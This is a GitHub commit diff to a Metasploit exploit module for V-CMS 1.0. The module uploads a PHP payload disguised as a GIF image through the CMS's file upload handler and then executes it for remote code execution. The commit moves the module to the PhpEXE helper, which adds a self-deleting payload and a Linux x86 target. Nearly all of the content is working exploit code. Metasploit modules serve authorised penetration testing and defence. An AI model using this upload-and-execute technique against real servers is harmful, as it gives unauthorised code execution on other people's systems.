Skip to content

Commit db12413

Browse files
egyptegypt
committed
Convert vcms_upload to use PhpEXE
Incidentally adds a Linux x86 target
1 parent 13a5892 commit db12413

File tree

1 file changed

+8
-24
lines changed

1 file changed

+8
-24
lines changed

modules/exploits/linux/http/vcms_upload.rb

Lines changed: 8 additions & 24 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
1111
Rank = ExcellentRanking
1212

1313
include Msf::Exploit::Remote::HttpClient
14+
include Msf::Exploit::PhpEXE
1415

1516
def initialize(info={})
1617
super(update_info(info,
@@ -28,8 +29,8 @@ def initialize(info={})
2829
'License' => MSF_LICENSE,
2930
'Author' =>
3031
[
31-
'AutoSec Tools', #Initial discovery
32-
'sinn3r' #Metasploit
32+
'AutoSec Tools', # Initial discovery
33+
'sinn3r' # Metasploit
3334
],
3435
'References' =>
3536
[
@@ -42,15 +43,12 @@ def initialize(info={})
4243
{
4344
'BadChars' => "\x00",
4445
},
45-
'DefaultOptions' =>
46-
{
47-
'EXITFUNC' => "none"
48-
},
4946
'Platform' => 'php',
5047
'Arch' => ARCH_PHP,
5148
'Targets' =>
5249
[
53-
['V-CMS 1.0', {}],
50+
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
51+
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
5452
],
5553
'Privileged' => false,
5654
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
@@ -75,34 +73,20 @@ def check
7573
end
7674
end
7775

78-
def on_new_session(client)
79-
if client.type == "meterpreter"
80-
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
81-
client.fs.file.rm(@payload_name)
82-
else
83-
client.shell_command_token("rm #{@payload_name}")
84-
end
85-
end
86-
8776
def exploit
8877
peer = "#{rhost}:#{rport}"
8978

9079
base = target_uri.path
9180
base << '/' if base[-1,1] != '/'
9281

9382
@payload_name = "#{rand_text_alpha(5)}.php"
94-
p = %Q|<?php
95-
#{payload.encoded}
96-
?>
97-
|
98-
99-
p = p.gsub(/^\t\t/, '')
83+
p = get_write_exec_payload(:unlink_self=>true)
10084

10185
post_data = "------x\r\n"
10286
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
10387
post_data << "Content-Type: image/gif\r\n"
10488
post_data << "\r\n"
105-
post_data << p
89+
post_data << p + "\r\n"
10690
post_data << "------x--\r\n"
10791

10892
print_status("#{peer} Uploading payload: #{@payload_name}")
@@ -133,4 +117,4 @@ def exploit
133117

134118
handler
135119
end
136-
end
120+
end

0 commit comments

Comments
 (0)